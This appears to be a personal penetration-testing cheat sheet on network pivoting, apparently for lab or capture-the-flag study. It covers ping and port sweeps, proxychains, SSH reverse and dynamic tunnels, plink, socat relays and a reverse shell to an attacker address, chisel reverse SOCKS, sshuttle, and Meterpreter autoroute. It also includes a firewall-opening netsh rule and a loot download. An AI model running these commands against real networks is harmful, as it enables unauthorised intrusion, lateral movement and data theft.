The Real Hugo
Husk

Pivoting

  • Tunnelling/Proxying
  • Port Forwarding

Enumeration

Using material found on the machine and preinstalled tools

  • arp -a
  • /etc/hosts or C:\Windows\System32\drivers\etc\hosts
  • /etc/resolv.conf
  • ipconfig /all
  • nmcli dev show
  • Statically compiled tools

Scripting Techniques

for i in {1..255}; do (ping -c 1 192.168.0.${1} | grep "bytes from" &); done
for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo $i is open; done
  • Using local tools through a proxy like nmap

Tools

  • Enumerating a network using native and statically compiled tools

Proxychains / FoxyProxy

  • In need of dynamic port forwarding execute a reverse proxy on the jumpserver to reach the attacker's proxychains sh ssh <username>@$ATTACKER_IP -R 9050 -N
  • Proxychains, e.g. scan target via nmap, or connect via nc through jump server sh proxychains nc <IP> <PORT> proychains nmap <IP> proxychains ssh user@$TARGET_IP proxychains evil-winrm -i $TARGET_IP -u $USER -p $PASS proxychains wget http://$TARGET_IP:8000/loot.zip
    • Use /etc/proxychains.conf or ./proxychains.confcontaining: ```sh [ProxyList]

    add proxy here ...

    meanwhile

    defaults set to "tor"

    socks4 127.0.0.1 9050

    socks5 127.0.0.1 1337

    proxy_dns

    ```

  • FoxyProxy, choose proxy type, proxy IP and port in settings

SSH port forwarding and tunnelling (primarily Unix)

  • LocalPortForwarding sh ssh -L $LOCAL_PORT:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN

    • Another possibility to use the jumpserver directly on it's cli via ssh <username>@<jumpserver> -L *:$LOCAL_PORT:127.0.0.1:80 -N. One can connect now to the target via the jumpserver
    • Tip: open port on windows target via sh netsh advfirewall firewall add rule name="new port" dir=in action=allow protocol=TCP localport=%PORT%

  • Dynamic Port Forwarding sh ssh -D $PORT <user>@<Jumpserver> -fN

  • Reverse Proxy, if there is an SSH client on the jumpserver but no SSH server via sh ssh -R $LOCAL_PORT:$TARGET_IP:$TARGET_PORT USERNAME@$ATTACKER_IP(local) -i $KEYFILE -fN

    • Tip1: create a user on the attacker to receive the connection without compromising your own password
    • Tip2: use -N to not receive an interactive shell. The attacking user does not necessarily have one on the target

plink.exe (Windows)

cmd.exe /c echo y | .\plink.exe -R <LocalPort>:<TargetIP>:<TargetPort> <user>@<Jumpserver> -i <key> -N
  • Key generation sh puttygen <keyfile> -o key.ppk
  • Circumvention, described by U.Y. 
echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:127.0.0.1:<TARGETPORT> <MYIP>

Socat

  • Reverse shell on target via sh ./socat tcp-l:8000 tcp:<attacker-IP>:443 &

    • Attacking bind shell sh sudo nc -lvnp 443

  • Relay on jumpserver via sh ./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &

  • Quiet Port Forwarding

    • On attacker sh socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
    • On relay server sh ./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
    • Open localhost:8000

  • Processes are backgrounded via &. Therefore, the process can be quit by using the corresponding bg number like kill %1.

  • In need of a Download on target, expose a port on the attacker via relay sh socat tcp-l:80,fork tcp:$ATTACKER_IP:80

Chisel

  • Does not require SSH on target

  • Reverse Proxy

    • Bind port on attacker sh ./chisel server -p <ListeningPort> --reverse &
    • Reverse port on target/proxy sh ./chisel client <attacker-IP>:<attacker-Port> R:socks &
    • proxychains.conf contains sh [ProxyList] socks5 127.0.0.1 <Listening-Port>

  • Forward SOCKS Proxy

    • Proxy/compromised machine sh ./chisel server -p <Listen-Port> --socks5
    • On attacker sh ./chisel client <target-IP>:<target-Port> <proxy-Port>:socks
  • Remote Port Forward
    • On attacker sh ./chisel server -p <Listen-Port> --reverse &
    • On forwarder sh ./chisel client <attacker-IP>:<attackerListen-Port> R:<Forwarder-Port>:<target-IP>:<target-Port> &
  • Local Port Forwarding
    • On proxy sh ./chisel server -p <Listen-Port>
    • On attacker sh ./chisel client <Listen-IP>:<Listen-Port> <attacker-IP>:<target-IP>:<target-Port>

sshuttle

  • pip install sshuttle
  • sshuttle -r <user>@<target> <subnet/CIDR>
  • or automatically determined
sshuttle -r <user>@<target> -N
  • Key based auth
sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>
  • Exclude servers via -x, for example the target/gateway server

Meterpreter

  • Meterpreter with payload set payload linux/x64/meterpreter_reverse_tcp after successful connection do
portfwd add -l 22 -p 22 -r 127.0.0.1

Meterpreter Auto Routing

  • Upload payload and catch it with multi/handler
background
use post/multi/manage/autoroute
set session 1
set subnet <10.0.0.0>
run

Meterpreter Proxy Routing

  • Specify socks proxy via
use auxiliary/server/socks_proxy
  • Set proxychain on attacker accordingly

rpivot